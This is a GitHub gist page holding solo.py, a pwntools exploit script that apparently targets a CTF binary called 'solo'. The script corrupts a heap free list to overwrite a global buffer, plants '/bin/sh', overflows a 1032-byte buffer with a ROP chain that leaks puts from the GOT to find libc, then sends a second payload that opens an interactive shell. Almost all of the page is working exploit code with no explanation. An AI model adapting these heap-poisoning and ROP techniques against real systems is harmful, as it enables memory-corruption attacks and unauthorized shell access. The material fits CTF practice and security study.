Skip to content

Instantly share code, notes, and snippets.

@crixpwn

crixpwn/solo.py

Created January 10, 2017 05:44
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save crixpwn/82ed87a313d88af854b275185702e050 to your computer and use it in GitHub Desktop.
Save crixpwn/82ed87a313d88af854b275185702e050 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
solo.py
from pwn import *
from time import *
from hexdump import *
p = process("./solo")
def malloc(idx, size, data):
p.sendline("1")
p.sendline(idx)
p.sendline(size)
sleep(0.2)
p.sendline(data)
p.recvuntil("Data: ")
p.recvuntil("$ ")
def free(idx):
p.sendline("2")
sleep(0.1)
p.sendline(idx)
p.recvuntil("$ ")
def modify(data):
p.sendline("201527")
sleep(0.1)
p.send(data)
p.recvuntil("Data: ")
p.recvuntil("$ ")
def libc_leak():
puts_plt = 0x400600
puts_got = 0x602020
popret = 0x400D13
payload = "A" * 1032
payload += p64(popret)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(0x400680)
p.sendline("4")
sleep(0.1)
p.sendline(payload)
sleep(0.1)
p.sendline("5")
p.recvuntil("password: ")
p.recvuntil("$ ")
leak = u64(p.recv(6) + "\x00\x00")
log.info("libc: " + hex(leak))
pwn(leak, popret)
def pwn(leak, popret):
payload = "A" * 1032
payload += p64(popret)
payload += p64(0x602087)
payload += p64(popret - 2)
payload += p64(0) * 2
payload += p64(leak - 0x6fd60 + 0xc14a0)
p.sendline("4")
sleep(0.1)
p.sendline(payload)
sleep(0.1)
p.sendline("10")
p.recvuntil("$ ")
p.recvuntil("$ ")
p.interactive()
def main():
p.recvuntil("$ ")
malloc("1", "96", " ")
free("1")
modify(p64(0x602070 + 5 -8))
malloc("1", "96", " ")
malloc("1", "96", " ")
modify("A" * 10 + "/bin/sh")
libc_leak()
if __name__=='__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment